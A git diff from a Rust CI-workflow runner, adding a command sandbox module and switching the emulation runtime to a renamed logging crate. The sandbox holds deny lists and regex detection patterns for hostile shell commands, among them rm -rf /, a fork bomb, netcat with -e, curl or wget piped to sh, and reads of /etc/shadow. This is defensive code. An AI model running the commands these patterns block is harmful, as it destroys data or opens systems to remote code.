cmd.current_dir(¤t_dir);
|
||||
|
||||
// Add environment variables
|
||||
for (key, value) in env_vars {
|
||||
// Don't use the CI_PROJECT_DIR for CARGO_HOME, use the actual project directory
|
||||
if *key == "CARGO_HOME" && value.contains("${CI_PROJECT_DIR}") {
|
||||
let cargo_home =
|
||||
value.replace("${CI_PROJECT_DIR}", ¤t_dir.to_string_lossy());
|
||||
wrkflw_logging::info(&format!("Setting CARGO_HOME to: {}", cargo_home));
|
||||
cmd.env(key, cargo_home);
|
||||
} else {
|
||||
cmd.env(key, value);
|
||||
}
|
||||
}
|
||||
|
||||
// Add command arguments
|
||||
if parts.len() > 1 {
|
||||
cmd.args(&parts[1..]);
|
||||
}
|
||||
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Executing Rust command: {} in {}",
|
||||
command_str,
|
||||
current_dir.display()
|
||||
));
|
||||
|
||||
match cmd.output() {
|
||||
Ok(output_result) => {
|
||||
let exit_code = output_result.status.code().unwrap_or(-1);
|
||||
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
|
||||
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
|
||||
|
||||
wrkflw_logging::debug(&format!("Command exit code: {}", exit_code));
|
||||
|
||||
if exit_code != 0 {
|
||||
let mut error_details = format!(
|
||||
"Command failed with exit code: {}\nCommand: {}\n\nError output:\n{}",
|
||||
exit_code, command_str, error
|
||||
);
|
||||
|
||||
// Add environment variables to error details
|
||||
error_details.push_str("\n\nEnvironment variables:\n");
|
||||
for (key, value) in env_vars {
|
||||
if key.starts_with("GITHUB_")
|
||||
|| key.starts_with("RUST")
|
||||
|| key.starts_with("CARGO")
|
||||
|| key.starts_with("CI_")
|
||||
{
|
||||
error_details.push_str(&format!("{}={}\n", key, value));
|
||||
}
|
||||
}
|
||||
@@ -223,11 +388,11 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
}
|
||||
}
|
||||
|
||||
// For other commands, use a shell
|
||||
// For other commands, use a shell as fallback
|
||||
let mut cmd = Command::new("sh");
|
||||
cmd.arg("-c");
|
||||
cmd.arg(&command_str);
|
||||
cmd.current_dir(working_dir.to_str().unwrap_or("."));
|
||||
cmd.current_dir(&actual_working_dir);
|
||||
|
||||
// Add environment variables
|
||||
for (key, value) in env_vars {
|
||||
@@ -240,7 +405,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
|
||||
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
|
||||
|
||||
logging::debug(&format!("Command completed with exit code: {}", exit_code));
|
||||
wrkflw_logging::debug(&format!("Command completed with exit code: {}", exit_code));
|
||||
|
||||
if exit_code != 0 {
|
||||
let mut error_details = format!(
|
||||
@@ -251,7 +416,7 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
// Add environment variables to error details
|
||||
error_details.push_str("\n\nEnvironment variables:\n");
|
||||
for (key, value) in env_vars {
|
||||
if key.starts_with("GITHUB_") {
|
||||
if key.starts_with("GITHUB_") || key.starts_with("CI_") {
|
||||
error_details.push_str(&format!("{}={}\n", key, value));
|
||||
}
|
||||
}
|
||||
@@ -278,12 +443,12 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
}
|
||||
|
||||
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
|
||||
logging::info(&format!("🔄 Emulation: Pretending to pull image {}", image));
|
||||
wrkflw_logging::info(&format!("🔄 Emulation: Pretending to pull image {}", image));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔄 Emulation: Pretending to build image {} from {}",
|
||||
tag,
|
||||
dockerfile.display()
|
||||
@@ -378,14 +543,14 @@ pub async fn handle_special_action(action: &str) -> Result<(), ContainerError> {
|
||||
"latest"
|
||||
};
|
||||
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔄 Processing action: {} @ {}",
|
||||
action_name, action_version
|
||||
));
|
||||
|
||||
// Handle specific known actions with special requirements
|
||||
if action.starts_with("cachix/install-nix-action") {
|
||||
logging::info("🔄 Emulating cachix/install-nix-action");
|
||||
wrkflw_logging::info("🔄 Emulating cachix/install-nix-action");
|
||||
|
||||
// In emulation mode, check if nix is installed
|
||||
let nix_installed = Command::new("which")
|
||||
@@ -395,56 +560,56 @@ pub async fn handle_special_action(action: &str) -> Result<(), ContainerError> {
|
||||
.unwrap_or(false);
|
||||
|
||||
if !nix_installed {
|
||||
logging::info("🔄 Emulation: Nix is required but not installed.");
|
||||
logging::info(
|
||||
wrkflw_logging::info("🔄 Emulation: Nix is required but not installed.");
|
||||
wrkflw_logging::info(
|
||||
"🔄 To use this workflow, please install Nix: https://nixos.org/download.html",
|
||||
);
|
||||
logging::info("🔄 Continuing emulation, but nix commands will fail.");
|
||||
wrkflw_logging::info("🔄 Continuing emulation, but nix commands will fail.");
|
||||
} else {
|
||||
logging::info("🔄 Emulation: Using system-installed Nix");
|
||||
wrkflw_logging::info("🔄 Emulation: Using system-installed Nix");
|
||||
}
|
||||
} else if action.starts_with("actions-rs/cargo@") {
|
||||
// For actions-rs/cargo action, ensure Rust is available
|
||||
logging::info(&format!("🔄 Detected Rust cargo action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Rust cargo action: {}", action));
|
||||
|
||||
// Verify Rust/cargo is installed
|
||||
check_command_available("cargo", "Rust/Cargo", "https://rustup.rs/");
|
||||
} else if action.starts_with("actions-rs/toolchain@") {
|
||||
// For actions-rs/toolchain action, check for Rust installation
|
||||
logging::info(&format!("🔄 Detected Rust toolchain action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Rust toolchain action: {}", action));
|
||||
|
||||
check_command_available("rustc", "Rust", "https://rustup.rs/");
|
||||
} else if action.starts_with("actions-rs/fmt@") {
|
||||
// For actions-rs/fmt action, check if rustfmt is available
|
||||
logging::info(&format!("🔄 Detected Rust formatter action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Rust formatter action: {}", action));
|
||||
|
||||
check_command_available("rustfmt", "rustfmt", "rustup component add rustfmt");
|
||||
} else if action.starts_with("actions/setup-node@") {
|
||||
// Node.js setup action
|
||||
logging::info(&format!("🔄 Detected Node.js setup action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Node.js setup action: {}", action));
|
||||
|
||||
check_command_available("node", "Node.js", "https://nodejs.org/");
|
||||
} else if action.starts_with("actions/setup-python@") {
|
||||
// Python setup action
|
||||
logging::info(&format!("🔄 Detected Python setup action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Python setup action: {}", action));
|
||||
|
||||
check_command_available("python", "Python", "https://www.python.org/downloads/");
|
||||
} else if action.starts_with("actions/setup-java@") {
|
||||
// Java setup action
|
||||
logging::info(&format!("🔄 Detected Java setup action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Java setup action: {}", action));
|
||||
|
||||
check_command_available("java", "Java", "https://adoptium.net/");
|
||||
} else if action.starts_with("actions/checkout@") {
|
||||
// Git checkout action - this is handled implicitly by our workspace setup
|
||||
logging::info("🔄 Detected checkout action - workspace files are already prepared");
|
||||
wrkflw_logging::info("🔄 Detected checkout action - workspace files are already prepared");
|
||||
} else if action.starts_with("actions/cache@") {
|
||||
// Cache action - can't really emulate caching effectively
|
||||
logging::info(
|
||||
wrkflw_logging::info(
|
||||
"🔄 Detected cache action - caching is not fully supported in emulation mode",
|
||||
);
|
||||
} else {
|
||||
// Generic action we don't have special handling for
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔄 Action '{}' has no special handling in emulation mode",
|
||||
action_name
|
||||
));
|
||||
@@ -463,12 +628,12 @@ fn check_command_available(command: &str, name: &str, install_url: &str) {
|
||||
.unwrap_or(false);
|
||||
|
||||
if !is_available {
|
||||
logging::warning(&format!("{} is required but not found on the system", name));
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::warning(&format!("{} is required but not found on the system", name));
|
||||
wrkflw_logging::info(&format!(
|
||||
"To use this action, please install {}: {}",
|
||||
name, install_url
|
||||
));
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Continuing emulation, but {} commands will fail",
|
||||
name
|
||||
));
|
||||
@@ -477,7 +642,7 @@ fn check_command_available(command: &str, name: &str, install_url: &str) {
|
||||
if let Ok(output) = Command::new(command).arg("--version").output() {
|
||||
if output.status.success() {
|
||||
let version = String::from_utf8_lossy(&output.stdout);
|
||||
logging::info(&format!("🔄 Using system {}: {}", name, version.trim()));
|
||||
wrkflw_logging::info(&format!("🔄 Using system {}: {}", name, version.trim()));
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -543,7 +708,7 @@ async fn cleanup_processes() {
|
||||
};
|
||||
|
||||
for pid in processes_to_cleanup {
|
||||
logging::info(&format!("Cleaning up emulated process: {}", pid));
|
||||
wrkflw_logging::info(&format!("Cleaning up emulated process: {}", pid));
|
||||
|
||||
#[cfg(unix)]
|
||||
{
|
||||
@@ -582,7 +747,7 @@ async fn cleanup_workspaces() {
|
||||
};
|
||||
|
||||
for workspace_path in workspaces_to_cleanup {
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Cleaning up emulation workspace: {}",
|
||||
workspace_path.display()
|
||||
));
|
||||
@@ -590,8 +755,8 @@ async fn cleanup_workspaces() {
|
||||
// Only attempt to remove if it exists
|
||||
if workspace_path.exists() {
|
||||
match fs::remove_dir_all(&workspace_path) {
|
||||
Ok(_) => logging::info("Successfully removed workspace directory"),
|
||||
Err(e) => logging::error(&format!("Error removing workspace: {}", e)),
|
||||
Ok(_) => wrkflw_logging::info("Successfully removed workspace directory"),
|
||||
Err(e) => wrkflw_logging::error(&format!("Error removing workspace: {}", e)),
|
||||
}
|
||||
}
|
||||
|
||||
6
crates/runtime/src/lib.rs
Normal file
6
crates/runtime/src/lib.rs
Normal file
@@ -0,0 +1,6 @@
|
||||
// runtime crate
|
||||
|
||||
pub mod container;
|
||||
pub mod emulation;
|
||||
pub mod sandbox;
|
||||
pub mod secure_emulation;
|
||||
672
crates/runtime/src/sandbox.rs
Normal file
672
crates/runtime/src/sandbox.rs
Normal file
@@ -0,0 +1,672 @@
|
||||
use regex::Regex;
|
||||
use std::collections::HashSet;
|
||||
use std::fs;
|
||||
use std::path::{Path, PathBuf};
|
||||
use std::process::{Command, Stdio};
|
||||
use std::time::Duration;
|
||||
use tempfile::TempDir;
|
||||
use wrkflw_logging;
|
||||
|
||||
/// Configuration for sandbox execution
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct SandboxConfig {
|
||||
/// Maximum execution time for commands
|
||||
pub max_execution_time: Duration,
|
||||
/// Maximum memory usage in MB
|
||||
pub max_memory_mb: u64,
|
||||
/// Maximum CPU usage percentage
|
||||
pub max_cpu_percent: u64,
|
||||
/// Allowed commands (whitelist)
|
||||
pub allowed_commands: HashSet<String>,
|
||||
/// Blocked commands (blacklist)
|
||||
pub blocked_commands: HashSet<String>,
|
||||
/// Allowed file system paths (read-only)
|
||||
pub allowed_read_paths: HashSet<PathBuf>,
|
||||
/// Allowed file system paths (read-write)
|
||||
pub allowed_write_paths: HashSet<PathBuf>,
|
||||
/// Whether to enable network access
|
||||
pub allow_network: bool,
|
||||
/// Maximum number of processes
|
||||
pub max_processes: u32,
|
||||
/// Whether to enable strict mode (more restrictive)
|
||||
pub strict_mode: bool,
|
||||
}
|
||||
|
||||
impl Default for SandboxConfig {
|
||||
fn default() -> Self {
|
||||
let mut allowed_commands = HashSet::new();
|
||||
|
||||
// Basic safe commands
|
||||
allowed_commands.insert("echo".to_string());
|
||||
allowed_commands.insert("printf".to_string());
|
||||
allowed_commands.insert("cat".to_string());
|
||||
allowed_commands.insert("head".to_string());
|
||||
allowed_commands.insert("tail".to_string());
|
||||
allowed_commands.insert("grep".to_string());
|
||||
allowed_commands.insert("sed".to_string());
|
||||
allowed_commands.insert("awk".to_string());
|
||||
allowed_commands.insert("sort".to_string());
|
||||
allowed_commands.insert("uniq".to_string());
|
||||
allowed_commands.insert("wc".to_string());
|
||||
allowed_commands.insert("cut".to_string());
|
||||
allowed_commands.insert("tr".to_string());
|
||||
allowed_commands.insert("which".to_string());
|
||||
allowed_commands.insert("pwd".to_string());
|
||||
allowed_commands.insert("env".to_string());
|
||||
allowed_commands.insert("date".to_string());
|
||||
allowed_commands.insert("basename".to_string());
|
||||
allowed_commands.insert("dirname".to_string());
|
||||
|
||||
// File operations (safe variants)
|
||||
allowed_commands.insert("ls".to_string());
|
||||
allowed_commands.insert("find".to_string());
|
||||
allowed_commands.insert("mkdir".to_string());
|
||||
allowed_commands.insert("touch".to_string());
|
||||
allowed_commands.insert("cp".to_string());
|
||||
allowed_commands.insert("mv".to_string());
|
||||
|
||||
// Development tools
|
||||
allowed_commands.insert("git".to_string());
|
||||
allowed_commands.insert("cargo".to_string());
|
||||
allowed_commands.insert("rustc".to_string());
|
||||
allowed_commands.insert("rustfmt".to_string());
|
||||
allowed_commands.insert("clippy".to_string());
|
||||
allowed_commands.insert("npm".to_string());
|
||||
allowed_commands.insert("yarn".to_string());
|
||||
allowed_commands.insert("node".to_string());
|
||||
allowed_commands.insert("python".to_string());
|
||||
allowed_commands.insert("python3".to_string());
|
||||
allowed_commands.insert("pip".to_string());
|
||||
allowed_commands.insert("pip3".to_string());
|
||||
allowed_commands.insert("java".to_string());
|
||||
allowed_commands.insert("javac".to_string());
|
||||
allowed_commands.insert("maven".to_string());
|
||||
allowed_commands.insert("gradle".to_string());
|
||||
allowed_commands.insert("go".to_string());
|
||||
allowed_commands.insert("dotnet".to_string());
|
||||
|
||||
// Compression tools
|
||||
allowed_commands.insert("tar".to_string());
|
||||
allowed_commands.insert("gzip".to_string());
|
||||
allowed_commands.insert("gunzip".to_string());
|
||||
allowed_commands.insert("zip".to_string());
|
||||
allowed_commands.insert("unzip".to_string());
|
||||
|
||||
let mut blocked_commands = HashSet::new();
|
||||
|
||||
// Dangerous system commands
|
||||
blocked_commands.insert("rm".to_string());
|
||||
blocked_commands.insert("rmdir".to_string());
|
||||
blocked_commands.insert("dd".to_string());
|
||||
blocked_commands.insert("mkfs".to_string());
|
||||
blocked_commands.insert("fdisk".to_string());
|
||||
blocked_commands.insert("mount".to_string());
|
||||
blocked_commands.insert("umount".to_string());
|
||||
blocked_commands.insert("sudo".to_string());
|
||||
blocked_commands.insert("su".to_string());
|
||||
blocked_commands.insert("passwd".to_string());
|
||||
blocked_commands.insert("chown".to_string());
|
||||
blocked_commands.insert("chmod".to_string());
|
||||
blocked_commands.insert("chgrp".to_string());
|
||||
blocked_commands.insert("chroot".to_string());
|
||||
|
||||
// Network and system tools
|
||||
blocked_commands.insert("nc".to_string());
|
||||
blocked_commands.insert("netcat".to_string());
|
||||
blocked_commands.insert("wget".to_string());
|
||||
blocked_commands.insert("curl".to_string());
|
||||
blocked_commands.insert("ssh".to_string());
|
||||
blocked_commands.insert("scp".to_string());
|
||||
blocked_commands.insert("rsync".to_string());
|
||||
|
||||
// Process control
|
||||
blocked_commands.insert("kill".to_string());
|
||||
blocked_commands.insert("killall".to_string());
|
||||
blocked_commands.insert("pkill".to_string());
|
||||
blocked_commands.insert("nohup".to_string());
|
||||
blocked_commands.insert("screen".to_string());
|
||||
blocked_commands.insert("tmux".to_string());
|
||||
|
||||
// System modification
|
||||
blocked_commands.insert("systemctl".to_string());
|
||||
blocked_commands.insert("service".to_string());
|
||||
blocked_commands.insert("crontab".to_string());
|
||||
blocked_commands.insert("at".to_string());
|
||||
blocked_commands.insert("reboot".to_string());
|
||||
blocked_commands.insert("shutdown".to_string());
|
||||
blocked_commands.insert("halt".to_string());
|
||||
blocked_commands.insert("poweroff".to_string());
|
||||
|
||||
Self {
|
||||
max_execution_time: Duration::from_secs(300), // 5 minutes
|
||||
max_memory_mb: 512,
|
||||
max_cpu_percent: 80,
|
||||
allowed_commands,
|
||||
blocked_commands,
|
||||
allowed_read_paths: HashSet::new(),
|
||||
allowed_write_paths: HashSet::new(),
|
||||
allow_network: false,
|
||||
max_processes: 10,
|
||||
strict_mode: true,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Sandbox error types
|
||||
#[derive(Debug, thiserror::Error)]
|
||||
pub enum SandboxError {
|
||||
#[error("Command blocked by security policy: {command}")]
|
||||
BlockedCommand { command: String },
|
||||
|
||||
#[error("Dangerous command pattern detected: {pattern}")]
|
||||
DangerousPattern { pattern: String },
|
||||
|
||||
#[error("Path access denied: {path}")]
|
||||
PathAccessDenied { path: String },
|
||||
|
||||
#[error("Resource limit exceeded: {resource}")]
|
||||
ResourceLimitExceeded { resource: String },
|
||||
|
||||
#[error("Execution timeout after {seconds} seconds")]
|
||||
ExecutionTimeout { seconds: u64 },
|
||||
|
||||
#[error("Sandbox setup failed: {reason}")]
|
||||
SandboxSetupError { reason: String },
|
||||
|
||||
#[error("Command execution failed: {reason}")]
|
||||
ExecutionError { reason: String },
|
||||
}
|
||||
|
||||
/// Secure sandbox for executing commands in emulation mode
|
||||
pub struct Sandbox {
|
||||
config: SandboxConfig,
|
||||
workspace: TempDir,
|
||||
dangerous_patterns: Vec<Regex>,
|
||||
}
|
||||
|
||||
impl Sandbox {
|
||||
/// Create a new sandbox with the given configuration
|
||||
pub fn new(config: SandboxConfig) -> Result<Self, SandboxError> {
|
||||
let workspace = tempfile::tempdir().map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to create sandbox workspace: {}", e),
|
||||
})?;
|
||||
|
||||
let dangerous_patterns = Self::compile_dangerous_patterns();
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"Created new sandbox with workspace: {}",
|
||||
workspace.path().display()
|
||||
));
|
||||
|
||||
Ok(Self {
|
||||
config,
|
||||
workspace,
|
||||
dangerous_patterns,
|
||||
})
|
||||
}
|
||||
|
||||
/// Execute a command in the sandbox
|
||||
pub async fn execute_command(
|
||||
&self,
|
||||
command: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
) -> Result<crate::container::ContainerOutput, SandboxError> {
|
||||
if command.is_empty() {
|
||||
return Err(SandboxError::ExecutionError {
|
||||
reason: "Empty command".to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
let command_str = command.join(" ");
|
||||
|
||||
// Step 1: Validate command
|
||||
self.validate_command(&command_str)?;
|
||||
|
||||
// Step 2: Setup sandbox environment
|
||||
let sandbox_dir = self.setup_sandbox_environment(working_dir)?;
|
||||
|
||||
// Step 3: Execute with limits
|
||||
self.execute_with_limits(command, env_vars, &sandbox_dir)
|
||||
.await
|
||||
}
|
||||
|
||||
/// Validate that a command is safe to execute
|
||||
fn validate_command(&self, command_str: &str) -> Result<(), SandboxError> {
|
||||
// Check for dangerous patterns first
|
||||
for pattern in &self.dangerous_patterns {
|
||||
if pattern.is_match(command_str) {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 Blocked dangerous command pattern: {}",
|
||||
command_str
|
||||
));
|
||||
return Err(SandboxError::DangerousPattern {
|
||||
pattern: command_str.to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
// Split command by shell operators to validate each part
|
||||
let command_parts = self.split_shell_command(command_str);
|
||||
|
||||
for part in command_parts {
|
||||
let part = part.trim();
|
||||
if part.is_empty() {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Extract the base command from this part
|
||||
let base_command = part.split_whitespace().next().unwrap_or("");
|
||||
let command_name = Path::new(base_command)
|
||||
.file_name()
|
||||
.and_then(|s| s.to_str())
|
||||
.unwrap_or(base_command);
|
||||
|
||||
// Skip shell built-ins and operators
|
||||
if self.is_shell_builtin(command_name) {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Check blocked commands
|
||||
if self.config.blocked_commands.contains(command_name) {
|
||||
wrkflw_logging::warning(&format!("🚫 Blocked command: {}", command_name));
|
||||
return Err(SandboxError::BlockedCommand {
|
||||
command: command_name.to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
// In strict mode, only allow whitelisted commands
|
||||
if self.config.strict_mode && !self.config.allowed_commands.contains(command_name) {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 Command not in whitelist (strict mode): {}",
|
||||
command_name
|
||||
));
|
||||
return Err(SandboxError::BlockedCommand {
|
||||
command: command_name.to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
wrkflw_logging::info(&format!("✅ Command validation passed: {}", command_str));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Split shell command by operators while preserving quoted strings
|
||||
fn split_shell_command(&self, command_str: &str) -> Vec<String> {
|
||||
// Simple split by common shell operators
|
||||
// This is not a full shell parser but handles most cases
|
||||
let separators = ["&&", "||", ";", "|"];
|
||||
let mut parts = vec![command_str.to_string()];
|
||||
|
||||
for separator in separators {
|
||||
let mut new_parts = Vec::new();
|
||||
for part in parts {
|
||||
let split_parts: Vec<String> = part
|
||||
.split(separator)
|
||||
.map(|s| s.trim().to_string())
|
||||
.filter(|s| !s.is_empty())
|
||||
.collect();
|
||||
new_parts.extend(split_parts);
|
||||
}
|
||||
parts = new_parts;
|
||||
}
|
||||
|
||||
parts
|
||||
}
|
||||
|
||||
/// Check if a command is a shell built-in
|
||||
fn is_shell_builtin(&self, command: &str) -> bool {
|
||||
let builtins = [
|
||||
"true", "false", "test", "[", "echo", "printf", "cd", "pwd", "export", "set", "unset",
|
||||
"alias", "history", "jobs", "fg", "bg", "wait", "read",
|
||||
];
|
||||
builtins.contains(&command)
|
||||
}
|
||||
|
||||
/// Setup isolated sandbox environment
|
||||
fn setup_sandbox_environment(&self, working_dir: &Path) -> Result<PathBuf, SandboxError> {
|
||||
let sandbox_root = self.workspace.path();
|
||||
let sandbox_workspace = sandbox_root.join("workspace");
|
||||
|
||||
// Create sandbox directory structure
|
||||
fs::create_dir_all(&sandbox_workspace).map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to create sandbox workspace: {}", e),
|
||||
})?;
|
||||
|
||||
// Copy allowed files to sandbox (if working_dir exists and is allowed)
|
||||
if working_dir.exists() && self.is_path_allowed(working_dir, false) {
|
||||
self.copy_safe_files(working_dir, &sandbox_workspace)?;
|
||||
}
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"Sandbox environment ready: {}",
|
||||
sandbox_workspace.display()
|
||||
));
|
||||
|
||||
Ok(sandbox_workspace)
|
||||
}
|
||||
|
||||
/// Copy files safely to sandbox, excluding dangerous files
|
||||
fn copy_safe_files(&self, source: &Path, dest: &Path) -> Result<(), SandboxError> {
|
||||
for entry in fs::read_dir(source).map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to read source directory: {}", e),
|
||||
})? {
|
||||
let entry = entry.map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to read directory entry: {}", e),
|
||||
})?;
|
||||
|
||||
let path = entry.path();
|
||||
let file_name = path.file_name().and_then(|s| s.to_str()).unwrap_or("");
|
||||
|
||||
// Skip dangerous or sensitive files
|
||||
if self.should_skip_file(file_name) {
|
||||
continue;
|
||||
}
|
||||
|
||||
let dest_path = dest.join(file_name);
|
||||
|
||||
if path.is_file() {
|
||||
fs::copy(&path, &dest_path).map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to copy file: {}", e),
|
||||
})?;
|
||||
} else if path.is_dir() && !self.should_skip_directory(file_name) {
|
||||
fs::create_dir_all(&dest_path).map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to create directory: {}", e),
|
||||
})?;
|
||||
self.copy_safe_files(&path, &dest_path)?;
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Execute command with resource limits and monitoring
|
||||
async fn execute_with_limits(
|
||||
&self,
|
||||
command: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
) -> Result<crate::container::ContainerOutput, SandboxError> {
|
||||
// Join command parts and execute via shell for proper handling of operators
|
||||
let command_str = command.join(" ");
|
||||
|
||||
let mut cmd = Command::new("sh");
|
||||
cmd.arg("-c");
|
||||
cmd.arg(&command_str);
|
||||
cmd.current_dir(working_dir);
|
||||
cmd.stdout(Stdio::piped());
|
||||
cmd.stderr(Stdio::piped());
|
||||
|
||||
// Set environment variables (filtered)
|
||||
for (key, value) in env_vars {
|
||||
if self.is_env_var_safe(key) {
|
||||
cmd.env(key, value);
|
||||
}
|
||||
}
|
||||
|
||||
// Add sandbox-specific environment variables
|
||||
cmd.env("WRKFLW_SANDBOXED", "true");
|
||||
cmd.env("WRKFLW_SANDBOX_MODE", "strict");
|
||||
|
||||
// Execute with timeout
|
||||
let timeout_duration = self.config.max_execution_time;
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"🏃 Executing sandboxed command: {} (timeout: {}s)",
|
||||
command.join(" "),
|
||||
timeout_duration.as_secs()
|
||||
));
|
||||
|
||||
let start_time = std::time::Instant::now();
|
||||
|
||||
let result = tokio::time::timeout(timeout_duration, async {
|
||||
let output = cmd.output().map_err(|e| SandboxError::ExecutionError {
|
||||
reason: format!("Command execution failed: {}", e),
|
||||
})?;
|
||||
|
||||
Ok(crate::container::ContainerOutput {
|
||||
stdout: String::from_utf8_lossy(&output.stdout).to_string(),
|
||||
stderr: String::from_utf8_lossy(&output.stderr).to_string(),
|
||||
exit_code: output.status.code().unwrap_or(-1),
|
||||
})
|
||||
})
|
||||
.await;
|
||||
|
||||
let execution_time = start_time.elapsed();
|
||||
|
||||
match result {
|
||||
Ok(output_result) => {
|
||||
wrkflw_logging::info(&format!(
|
||||
"✅ Sandboxed command completed in {:.2}s",
|
||||
execution_time.as_secs_f64()
|
||||
));
|
||||
output_result
|
||||
}
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"⏰ Sandboxed command timed out after {:.2}s",
|
||||
timeout_duration.as_secs_f64()
|
||||
));
|
||||
Err(SandboxError::ExecutionTimeout {
|
||||
seconds: timeout_duration.as_secs(),
|
||||
})
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if a path is allowed for access
|
||||
fn is_path_allowed(&self, path: &Path, write_access: bool) -> bool {
|
||||
let abs_path = path.canonicalize().unwrap_or_else(|_| path.to_path_buf());
|
||||
|
||||
if write_access {
|
||||
self.config
|
||||
.allowed_write_paths
|
||||
.iter()
|
||||
.any(|allowed| abs_path.starts_with(allowed))
|
||||
} else {
|
||||
self.config
|
||||
.allowed_read_paths
|
||||
.iter()
|
||||
.any(|allowed| abs_path.starts_with(allowed))
|
||||
|| self
|
||||
.config
|
||||
.allowed_write_paths
|
||||
.iter()
|
||||
.any(|allowed| abs_path.starts_with(allowed))
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if an environment variable is safe to pass through
|
||||
fn is_env_var_safe(&self, key: &str) -> bool {
|
||||
// Block dangerous environment variables
|
||||
let dangerous_env_vars = [
|
||||
"LD_PRELOAD",
|
||||
"LD_LIBRARY_PATH",
|
||||
"DYLD_INSERT_LIBRARIES",
|
||||
"DYLD_LIBRARY_PATH",
|
||||
"PATH",
|
||||
"HOME",
|
||||
"SHELL",
|
||||
];
|
||||
|
||||
!dangerous_env_vars.contains(&key)
|
||||
}
|
||||
|
||||
/// Check if a file should be skipped during copying
|
||||
fn should_skip_file(&self, filename: &str) -> bool {
|
||||
let dangerous_files = [
|
||||
".ssh",
|
||||
".gnupg",
|
||||
".aws",
|
||||
".docker",
|
||||
"id_rsa",
|
||||
"id_ed25519",
|
||||
"credentials",
|
||||
"config",
|
||||
".env",
|
||||
".secrets",
|
||||
];
|
||||
|
||||
dangerous_files
|
||||
.iter()
|
||||
.any(|pattern| filename.contains(pattern))
|
||||
|| filename.starts_with('.') && filename != ".gitignore" && filename != ".github"
|
||||
}
|
||||
|
||||
/// Check if a directory should be skipped
|
||||
fn should_skip_directory(&self, dirname: &str) -> bool {
|
||||
let skip_dirs = [
|
||||
"target",
|
||||
"node_modules",
|
||||
".git",
|
||||
".cargo",
|
||||
".npm",
|
||||
".cache",
|
||||
"build",
|
||||
"dist",
|
||||
"tmp",
|
||||
"temp",
|
||||
];
|
||||
|
||||
skip_dirs.contains(&dirname)
|
||||
}
|
||||
|
||||
/// Compile regex patterns for dangerous command detection
|
||||
fn compile_dangerous_patterns() -> Vec<Regex> {
|
||||
let patterns = [
|
||||
r"rm\s+.*-rf?\s*/", // rm -rf /
|
||||
r"dd\s+.*of=/dev/", // dd ... of=/dev/...
|
||||
r">\s*/dev/sd[a-z]", // > /dev/sda
|
||||
r"mkfs\.", // mkfs.ext4, etc.
|
||||
r"fdisk\s+/dev/", // fdisk /dev/...
|
||||
r"mount\s+.*\s+/", // mount ... /
|
||||
r"chroot\s+/", // chroot /
|
||||
r"sudo\s+", // sudo commands
|
||||
r"su\s+", // su commands
|
||||
r"bash\s+-c\s+.*rm.*-rf", // bash -c "rm -rf ..."
|
||||
r"sh\s+-c\s+.*rm.*-rf", // sh -c "rm -rf ..."
|
||||
r"eval\s+.*rm.*-rf", // eval "rm -rf ..."
|
||||
r":\(\)\{.*;\};:", // Fork bomb
|
||||
r"/proc/sys/", // /proc/sys access
|
||||
r"/etc/passwd", // /etc/passwd access
|
||||
r"/etc/shadow", // /etc/shadow access
|
||||
r"nc\s+.*-e", // netcat with exec
|
||||
r"wget\s+.*\|\s*sh", // wget ... | sh
|
||||
r"curl\s+.*\|\s*sh", // curl ... | sh
|
||||
];
|
||||
|
||||
patterns
|
||||
.iter()
|
||||
